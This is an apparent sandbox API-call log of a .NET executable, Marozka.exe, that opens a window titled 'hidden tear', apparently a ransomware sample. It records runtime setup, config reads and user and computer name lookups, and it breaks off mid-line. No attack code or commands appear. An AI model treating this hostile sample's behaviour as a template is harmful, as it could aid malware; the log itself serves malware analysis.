# Flog Txt Version 1 # Analyzer Version: 3.0.1 # Analyzer Build Date: Mar 26 2019 18:49:32 # Log Creation Date: 30.03.2019 07:54:11.040 Process: id = "1" image_name = "marozka.exe" filename = "c:\\users\\fd1hvy\\desktop\\marozka.exe" page_root = "0xb56a000" os_pid = "0xd20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\FD1HVy\\Desktop\\Marozka.exe\" " cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0x6ac [0033.561] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0033.847] RoInitialize () returned 0x1 [0033.848] RoUninitialize () returned 0x0 [0035.093] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0x5bea30 | out: phkResult=0x5bea30*=0x0) returned 0x2 [0035.093] RegCloseKey (hKey=0x80000002) returned 0x0 [0035.099] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", nBufferLength=0x105, lpBuffer=0x5bec88, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", lpFilePart=0x0) returned 0x77 [0035.117] IsAppThemed () returned 0x1 [0035.119] CoTaskMemAlloc (cb=0xf0) returned 0xa7af18 [0035.119] CreateActCtxA (pActCtx=0x5bf1d8) returned 0xa7a054 [0035.222] CoTaskMemFree (pv=0xa7af18) [0035.230] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc151 [0035.230] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc16e [0035.261] GetUserNameW (in: lpBuffer=0x5bf000, pcbBuffer=0x5bf278 | out: lpBuffer="FD1HVy", pcbBuffer=0x5bf278) returned 1 [0035.264] GetComputerNameW (in: lpBuffer=0x5bf000, nSize=0x5bf278 | out: lpBuffer="NQDPDE", nSize=0x5bf278) returned 1 [0035.600] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Marozka.exe.config", nBufferLength=0x105, lpBuffer=0x5bead8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Marozka.exe.config", lpFilePart=0x0) returned 0x2a [0035.853] GetCurrentProcess () returned 0xffffffff [0035.853] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5bee40 | out: TokenHandle=0x5bee40*=0x2cc) returned 1 [0035.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x5be8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0035.858] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x5bee38 | out: lpFileInformation=0x5bee38*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56a29ff, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97df7583, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97df7583, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0035.859] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x5be898, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0035.859] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x5bee40 | out: lpFileInformation=0x5bee40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56a29ff, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97df7583, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97df7583, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0035.860] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x5be834, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0035.862] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bed78) returned 1 [0035.862] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2d0 [0035.862] GetFileType (hFile=0x2d0) returned 0x1 [0035.862] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bed74) returned 1 [0035.862] GetFileType (hFile=0x2d0) returned 0x1 [0035.880] GetFileSize (in: hFile=0x2d0, lpFileSizeHigh=0x5bee34 | out: lpFileSizeHigh=0x5bee34*=0x0) returned 0x8c8f [0035.880] ReadFile (in: hFile=0x2d0, lpBuffer=0x2609c44, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5bedf0, lpOverlapped=0x0 | out: lpBuffer=0x2609c44*, lpNumberOfBytesRead=0x5bedf0*=0x1000, lpOverlapped=0x0) returned 1 [0035.893] ReadFile (in: hFile=0x2d0, lpBuffer=0x2609c44, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5bec9c, lpOverlapped=0x0 | out: lpBuffer=0x2609c44*, lpNumberOfBytesRead=0x5bec9c*=0x1000, lpOverlapped=0x0) returned 1 [0035.895] ReadFile (in: hFile=0x2d0, lpBuffer=0x2609c44, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5beb50, lpOverlapped=0x0 | out: lpBuffer=0x2609c44*, lpNumberOfBytesRead=0x5beb50*=0x1000, lpOverlapped=0x0) returned 1 [0035.895] ReadFile (in: hFile=0x2d0, lpBuffer=0x2609c44, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5beb50, lpOverlapped=0x0 | out: lpBuffer=0x2609c44*, lpNumberOfBytesRead=0x5beb50*=0x1000, lpOverlapped=0x0) returned 1 [0035.895] ReadFile (in: hFile=0x2d0, lpBuffer=0x2609c44, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5beb50, lpOverlapped=0x0 | out: lpBuffer=0x2609c44*, lpNumberOfBytesRead=0x5beb50*=0x1000, lpOverlapped=0x0) returned 1 [0035.896] ReadFile (in: hFile=0x2d0, lpBuffer=0x2609c44, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5bea88, lpOverlapped=0x0 | out: lpBuffer=0x2609c44*, lpNumberOfBytesRead=0x5bea88*=0x1000, lpOverlapped=0x0) returned 1 [0035.900] ReadFile (in: hFile=0x2d0, lpBuffer=0x2609c44, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5bec0c, lpOverlapped=0x0 | out: lpBuffer=0x2609c44*, lpNumberOfBytesRead=0x5bec0c*=0x1000, lpOverlapped=0x0) returned 1 [0035.901] ReadFile (in: hFile=0x2d0, lpBuffer=0x2609c44, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5beb18, lpOverlapped=0x0 | out: lpBuffer=0x2609c44*, lpNumberOfBytesRead=0x5beb18*=0x1000, lpOverlapped=0x0) returned 1 [0035.901] ReadFile (in: hFile=0x2d0, lpBuffer=0x2609c44, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5beb18, lpOverlapped=0x0 | out: lpBuffer=0x2609c44*, lpNumberOfBytesRead=0x5beb18*=0xc8f, lpOverlapped=0x0) returned 1 [0035.902] ReadFile (in: hFile=0x2d0, lpBuffer=0x2609c44, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5bebdc, lpOverlapped=0x0 | out: lpBuffer=0x2609c44*, lpNumberOfBytesRead=0x5bebdc*=0x0, lpOverlapped=0x0) returned 1 [0035.902] CloseHandle (hObject=0x2d0) returned 1 [0035.903] GetCurrentProcess () returned 0xffffffff [0035.903] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5bef88 | out: TokenHandle=0x5bef88*=0x2d0) returned 1 [0035.904] GetCurrentProcess () returned 0xffffffff [0035.904] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5bef88 | out: TokenHandle=0x5bef88*=0x2d4) returned 1 [0035.904] GetCurrentProcess () returned 0xffffffff [0035.904] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5bee40 | out: TokenHandle=0x5bee40*=0x2d8) returned 1 [0035.904] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Marozka.exe.config" (normalized: "c:\\users\\fd1hvy\\desktop\\marozka.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x5bee38 | out: lpFileInformation=0x5bee38*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0035.904] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Marozka.exe.config", nBufferLength=0x105, lpBuffer=0x5be898, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Marozka.exe.config", lpFilePart=0x0) returned 0x2a [0035.904] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Marozka.exe.config" (normalized: "c:\\users\\fd1hvy\\desktop\\marozka.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x5bee40 | out: lpFileInformation=0x5bee40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0035.905] GetCurrentProcess () returned 0xffffffff [0035.905] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5bef88 | out: TokenHandle=0x5bef88*=0x2dc) returned 1 [0035.905] GetCurrentProcess () returned 0xffffffff [0035.905] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5bef88 | out: TokenHandle=0x5bef88*=0x2e0) returned 1 [0035.919] GetCurrentProcess () returned 0xffffffff [0035.919] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5bede8 | out: TokenHandle=0x5bede8*=0x2e4) returned 1 [0035.923] GetCurrentProcess () returned 0xffffffff [0035.923] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x5bedf8 | out: TokenHandle=0x5bedf8*=0x2e8) returned 1 [0035.972] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0 [0036.377] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x6ff80000 [0036.412] AdjustWindowRectEx (in: lpRect=0x5bf218, dwStyle=0x56cf0000, bMenu=0, dwExStyle=0x50081 | out: lpRect=0x5bf218) returned 1 [0036.414] GetCurrentProcess () returned 0xffffffff [0036.414] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5bf12c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5bf12c*=0x2f0) returned 1 [0036.423] GetCurrentActCtx (in: lphActCtx=0x5bf08c | out: lphActCtx=0x5bf08c*=0x0) returned 1 [0036.426] ActivateActCtx (in: hActCtx=0xa7a054, lpCookie=0x5bf09c | out: hActCtx=0xa7a054, lpCookie=0x5bf09c) returned 1 [0036.426] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0 [0036.861] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x6fd70000 [0036.870] GetModuleHandleW (lpModuleName="user32.dll") returned 0x74b70000 [0036.870] GetProcAddress (hModule=0x74b70000, lpProcName="DefWindowProcW") returned 0x74600140 [0036.871] GetStockObject (i=5) returned 0x900015 [0036.873] GetModuleHandleW (lpModuleName=0x0) returned 0x3f0000 [0036.875] CoTaskMemAlloc (cb=0x5a) returned 0xa8c470 [0036.875] RegisterClassW (lpWndClass=0x5bef40) returned 0xc16d [0036.876] CoTaskMemFree (pv=0xa8c470) [0036.876] GetModuleHandleW (lpModuleName=0x0) returned 0x3f0000 [0036.877] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.141b42a_r9_ad1", lpWindowName=0x0, dwStyle=0x2010000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xfffffffd, hMenu=0x0, hInstance=0x3f0000, lpParam=0x0) returned 0x401f8 [0036.877] SetWindowLongW (hWnd=0x401f8, nIndex=-4, dwNewLong=1952448832) returned 39716286 [0036.878] GetWindowLongW (hWnd=0x401f8, nIndex=-4) returned 1952448832 [0036.880] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x5be760 | out: phkResult=0x5be760*=0x308) returned 0x0 [0036.880] RegQueryValueExW (in: hKey=0x308, lpValueName="DbgJITDebugLaunchSetting", lpReserved=0x0, lpType=0x5be780, lpData=0x0, lpcbData=0x5be77c*=0x0 | out: lpType=0x5be780*=0x0, lpData=0x0, lpcbData=0x5be77c*=0x0) returned 0x2 [0036.880] RegQueryValueExW (in: hKey=0x308, lpValueName="DbgManagedDebugger", lpReserved=0x0, lpType=0x5be780, lpData=0x0, lpcbData=0x5be77c*=0x0 | out: lpType=0x5be780*=0x0, lpData=0x0, lpcbData=0x5be77c*=0x0) returned 0x2 [0036.880] RegCloseKey (hKey=0x308) returned 0x0 [0036.881] SetWindowLongW (hWnd=0x401f8, nIndex=-4, dwNewLong=39716326) returned 1952448832 [0036.881] GetWindowLongW (hWnd=0x401f8, nIndex=-4) returned 39716326 [0036.881] GetWindowLongW (hWnd=0x401f8, nIndex=-16) returned 113311744 [0036.882] RegisterClipboardFormatW (lpszFormat="WinFormsMouseEnter") returned 0xc170 [0036.883] RegisterClipboardFormatW (lpszFormat="WinFormsUnSubclass") returned 0xc171 [0036.883] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x401f8, Msg=0x81, wParam=0x0, lParam=0x5beab0) returned 0x1 [0036.883] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x401f8, Msg=0x83, wParam=0x0, lParam=0x5bea9c) returned 0x0 [0037.023] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x401f8, Msg=0x1, wParam=0x0, lParam=0x5beab0) returned 0x0 [0037.024] GetClientRect (in: hWnd=0x401f8, lpRect=0x5be798 | out: lpRect=0x5be798) returned 1 [0037.024] GetWindowRect (in: hWnd=0x401f8, lpRect=0x5be798 | out: lpRect=0x5be798) returned 1 [0037.025] GetParent (hWnd=0x401f8) returned 0x0 [0037.025] DeactivateActCtx (dwFlags=0x0, ulCookie=0x183a0001) returned 1 [0037.080] EtwEventRegister (in: ProviderId=0x2625ec0, EnableCallback=0x25e060e, CallbackContext=0x0, RegHandle=0x2625e9c | out: RegHandle=0x2625e9c) returned 0x0 [0037.125] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ff80000 [0037.125] AdjustWindowRectEx (in: lpRect=0x5bf1c4, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50080 | out: lpRect=0x5bf1c4) returned 1 [0037.125] GetSystemMetrics (nIndex=59) returned 1460 [0037.125] GetSystemMetrics (nIndex=60) returned 920 [0037.125] GetSystemMetrics (nIndex=34) returned 136 [0037.125] GetSystemMetrics (nIndex=35) returned 39 [0037.125] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ff80000 [0037.126] AdjustWindowRectEx (in: lpRect=0x5bf0c4, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50080 | out: lpRect=0x5bf0c4) returned 1 [0037.130] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Marozka.exe.config", nBufferLength=0x105, lpBuffer=0x5bea98, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Marozka.exe.config", lpFilePart=0x0) returned 0x2a [0037.130] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bef54) returned 1 [0037.131] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Marozka.exe.config" (normalized: "c:\\users\\fd1hvy\\desktop\\marozka.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x5befd0 | out: lpFileInformation=0x5befd0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0037.131] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bef50) returned 1 [0037.699] GetSystemMetrics (nIndex=11) returned 32 [0037.699] GetSystemMetrics (nIndex=12) returned 32 [0037.699] GetDC (hWnd=0x0) returned 0x60100ce [0037.701] GetDeviceCaps (hdc=0x60100ce, index=12) returned 32 [0037.701] GetDeviceCaps (hdc=0x60100ce, index=14) returned 1 [0037.702] ReleaseDC (hWnd=0x0, hDC=0x60100ce) returned 1 [0037.702] CreateIconFromResourceEx (presbits=0x2639048, dwResSize=0x10a8, fIcon=1, dwVer=0x30000, cxDesired=0, cyDesired=0, Flags=0x0) returned 0x400e1 [0037.741] CreateCompatibleDC (hdc=0x0) returned 0x280106f8 [0037.755] GetSystemDefaultLCID () returned 0x409 [0037.755] GetStockObject (i=17) returned 0xa01c1 [0037.756] GetObjectW (in: h=0xa01c1, c=92, pv=0x5bef14 | out: pv=0x5bef14) returned 92 [0037.756] GetDC (hWnd=0x0) returned 0x60100ce [0037.819] GdiplusStartup (in: token=0x885ee8, input=0x5be4c8, output=0x5be518 | out: token=0x885ee8, output=0x5be518) returned 0x0 [0037.823] CoTaskMemAlloc (cb=0x5c) returned 0xa91830 [0037.824] GdipCreateFontFromLogfontW (hdc=0x60100ce, logfont=0xa91830, font=0x5befdc) returned 0x0 [0038.124] CoTaskMemFree (pv=0xa91830) [0038.124] CoTaskMemAlloc (cb=0x5c) returned 0xa91830 [0038.124] CoTaskMemFree (pv=0xa91830) [0038.125] CoTaskMemAlloc (cb=0x5c) returned 0xa91830 [0038.125] CoTaskMemFree (pv=0xa91830) [0038.125] GdipGetFontUnit (font=0x4dc1f08, unit=0x5befa4) returned 0x0 [0038.125] GdipGetFontSize (font=0x4dc1f08, size=0x5befa8) returned 0x0 [0038.125] GdipGetFontStyle (font=0x4dc1f08, style=0x5befa0) returned 0x0 [0038.125] GdipGetFamily (font=0x4dc1f08, family=0x5bef9c) returned 0x0 [0038.126] GdipGetFontSize (font=0x4dc1f08, size=0x263a5b4) returned 0x0 [0038.126] ReleaseDC (hWnd=0x0, hDC=0x60100ce) returned 1 [0038.126] GetDC (hWnd=0x0) returned 0x50106f6 [0038.126] GdipCreateFromHDC (hdc=0x50106f6, graphics=0x5befb8) returned 0x0 [0038.130] GdipGetDpiY (graphics=0x5f5f260, dpi=0x263a690) returned 0x0 [0038.130] GdipGetFontHeight (font=0x4dc1f08, graphics=0x5f5f260, height=0x5befb0) returned 0x0 [0038.130] GdipGetEmHeight (family=0x4dc8578, style=0, EmHeight=0x5befb8) returned 0x0 [0038.130] GdipGetLineSpacing (family=0x4dc8578, style=0, LineSpacing=0x5befb8) returned 0x0 [0038.130] GdipDeleteGraphics (graphics=0x5f5f260) returned 0x0 [0038.130] ReleaseDC (hWnd=0x0, hDC=0x50106f6) returned 1 [0038.131] GdipCreateFont (fontFamily=0x4dc8578, emSize=0x41040000, style=0, unit=0x3, font=0x263a6ac) returned 0x0 [0038.131] GdipGetFontSize (font=0x4dcef48, size=0x263a6b0) returned 0x0 [0038.131] GdipDeleteFont (font=0x4dc1f08) returned 0x0 [0038.131] GetDC (hWnd=0x0) returned 0x50106f6 [0038.131] GdipCreateFromHDC (hdc=0x50106f6, graphics=0x5befec) returned 0x0 [0038.131] CoTaskMemAlloc (cb=0x5c) returned 0xa91830 [0038.134] GdipGetLogFontW (font=0x4dcef48, graphics=0x5f5f260, logfontW=0xa91830) returned 0x0 [0038.137] CoTaskMemFree (pv=0xa91830) [0038.137] CoTaskMemAlloc (cb=0x5c) returned 0xa91830 [0038.137] CoTaskMemFree (pv=0xa91830) [0038.138] CoTaskMemAlloc (cb=0x5c) returned 0xa91830 [0038.138] CoTaskMemFree (pv=0xa91830) [0038.138] GdipDeleteGraphics (graphics=0x5f5f260) returned 0x0 [0038.138] ReleaseDC (hWnd=0x0, hDC=0x50106f6) returned 1 [0038.138] CoTaskMemAlloc (cb=0x5c) returned 0xa91830 [0038.138] CreateFontIndirectW (lplf=0xa91830) returned 0x480a060c [0038.138] CoTaskMemFree (pv=0xa91830) [0038.138] SelectObject (hdc=0x280106f8, h=0x480a060c) returned 0x8a01c2 [0038.138] GetTextMetricsW (in: hdc=0x280106f8, lptm=0x5bf0f8 | out: lptm=0x5bf0f8) returned 1 [0038.139] GetTextExtentPoint32W (in: hdc=0x280106f8, lpString="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ", c=52, psizl=0x263a8d8 | out: psizl=0x263a8d8) returned 1 [0038.146] SelectObject (hdc=0x280106f8, h=0x8a01c2) returned 0x480a060c [0038.148] DeleteDC (hdc=0x280106f8) returned 1 [0038.148] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ff80000 [0038.148] AdjustWindowRectEx (in: lpRect=0x5bee40, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x5bee40) returned 1 [0038.149] AdjustWindowRectEx (in: lpRect=0x5bf084, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50080 | out: lpRect=0x5bf084) returned 1 [0038.149] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6ff80000 [0038.149] AdjustWindowRectEx (in: lpRect=0x5bedb8, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x5bedb8) returned 1 [0038.149] AdjustWindowRectEx (in: lpRect=0x5beebc, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50080 | out: lpRect=0x5beebc) returned 1 [0038.149] GetSystemMetrics (nIndex=34) returned 136 [0038.149] GetSystemMetrics (nIndex=35) returned 39 [0038.149] GetCurrentActCtx (in: lphActCtx=0x5bf24c | out: lphActCtx=0x5bf24c*=0x0) returned 1 [0038.150] ActivateActCtx (in: hActCtx=0xa7a054, lpCookie=0x5bf25c | out: hActCtx=0xa7a054, lpCookie=0x5bf25c) returned 1 [0038.150] GetCurrentActCtx (in: lphActCtx=0x5bf06c | out: lphActCtx=0x5bf06c*=0xa7a054) returned 1 [0038.150] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x6fd70000 [0038.150] AdjustWindowRectEx (in: lpRect=0x5befac, dwStyle=0x2cf0000, bMenu=0, dwExStyle=0x50000 | out: lpRect=0x5befac) returned 1 [0038.150] GetModuleHandleW (lpModuleName=0x0) returned 0x3f0000 [0038.150] CreateWindowExW (dwExStyle=0x50080, lpClassName="WindowsForms10.Window.8.app.0.141b42a_r9_ad1", lpWindowName="hidden tear", dwStyle=0x2cf0000, X=-2147483648, Y=-2147483648, nWidth=140, nHeight=92, hWndParent=0x0, hMenu=0x0, hInstance=0x3f0000, lpParam=0x0) returned 0x60116 [0038.150] SetWindowLongW (hWnd=0x60116, nIndex=-4, dwNewLong=1952448832) returned 39716286 [0038.150] GetWindowLongW (hWnd=0x60116, nIndex=-4) returned 1952448832 [0038.151] SetWindowLongW (hWnd=0x60116, nIndex=-4, dwNewLong=39716406) returned 1952448832 [0038.151] GetWindowLongW (hWnd=0x60116, nIndex=-4) returned 39716406 [0038.151] GetWindowLongW (hWnd=0x60116, nIndex=-16) returned 114229248 [0038.151] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x60116, Msg=0x81, wParam=0x0, lParam=0x5bea90) returned 0x1 [0038.153] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x60116, Msg=0x83, wParam=0x0, lParam=0x5bea7c) returned 0x0 [0038.154] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x60116, Msg=0x1, wParam=0x0, lParam=0x5bea90) returned 0x0 [0038.154] GetClientRect (in: hWnd=0x60116, lpRect=0x5be748 | out: lpRect=0x5be748) returned 1 [0038.154] GetWindowRect (in: hWnd=0x60116, lpRect=0x5be748 | out: lpRect=0x5be748) returned 1 [0038.154] SetWindowTextW (hWnd=0x60116, lpString="hidden tear") returned 1 [0038.155] CallWindowProcW (lpPrevWndFunc=0x74600140, hWnd=0x60116, Msg=0xc, wParam=0x0, lParam=0x2625b04) returned 0x1 [0038.161] GetUserObjectInformationA (in: hObj=0x13c, nIndex=1, pvInfo=0x263adf4, nLength=0xc, lpnLengthNeeded=0x5be640 | out: pvInfo=0x263adf4, lpnLengthNeeded=0x5be640) returned 1 [0038.163] SetConsoleCtrlHandler (HandlerRoutine=0x25e065e, Add=1) returned 1 [0038.164] GetModuleHandleW (lpModuleName=0x0) returned 0x3f0000 [0038.164] GetModuleHandleW (lpModuleName=0x0) returned 0x3f0000 [0038.165] GetClassInfoW (in: hInstance=0x3f0000, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.141b42a.0", lpWndClass=0x263ae58 | out: lpWndClass=0x263ae58) returned 0 [0038.166] CoTaskMemAlloc (cb=0x58) returned 0xa75cf0 [0038.167] RegisterClassW (lpWndClass=0x5be590) returned 0xc173 [0038.167] CoTaskMemFree (pv=0xa75cf0) [0038.167] CreateWindowExW (dwExStyle=0x0, lpClassName=".NET-BroadcastEventWindow.4.0.0.0.141b42a.0", lpWindowName=".NET-BroadcastEventWindow.4.0.0.0.141b42a.0", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x3f0000, lpParam=0x0) returned 0x60044 [0038.169] NtdllDefWindowProc_W (hWnd=0x60044, Msg=0x83, wParam=0x0, lParam=0x5be0bc) returned 0x0 [0038.169] NtdllDefWindowProc_W (hWnd=0x60044, Msg=0x1, wParam=0x0, lParam=0x5be0d0) returned 0x0 [0038.169] NtdllDefWindowProc_W (hWnd=0x60044, Msg=0x5, wParam=0x0, lParam=0x0) returned 0x0 [0038.169] NtdllDefWindowProc_W (hWnd=0x60044, Msg=0x3, wParam=0x0, lParam=0x0) returned 0x0 [0038.173] GetStartupInfoW (in: lpStartupInfo=0x263b2b0 | out: lpStartupInfo=0x263b2b0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\FD1HVy\\Desktop\\Marozka.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0038.175] GetParent (hWnd=0x60116) returned 0x0 [0038.175] SetWindowLongW (hWnd=0x60116, nIndex=-8, dwNewLong=0) returned 0 [0038.176] GetSystemMetrics (nIndex=49) returned 16 [0038.176] GetSystemMetrics (nIndex=50) returned 